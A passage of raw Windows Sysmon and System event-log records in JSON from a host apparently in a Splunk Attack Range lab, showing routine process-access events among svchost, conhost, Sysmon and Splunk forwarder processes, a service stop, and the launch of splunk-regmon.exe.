07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FBB-5F25-0000-00103CE50400}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FBB-5F25-0000-00103CE50400}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.501\r\nSourceProcessGUID: {41C8662E-1FBB-5F25-0000-00103CE50400}\r\nSourceProcessId: 4384\r\nSourceThreadId: 4484\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.501","SourceProcessGUID":"{41C8662E-1FBB-5F25-0000-00103CE50400}","SourceProcessId":"4384","SourceThreadId":"4484","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76844,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The DsmSvc service entered the stopped state.","param1":"DsmSvc","param2":"stopped","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:36.049\r\nProcessGuid: {41C8662E-1FBC-5F25-0000-001040E70400}\r\nProcessId: 4536\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:36.049","ProcessGuid":"{41C8662E-1FBC-5F25-0000-001040E70400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
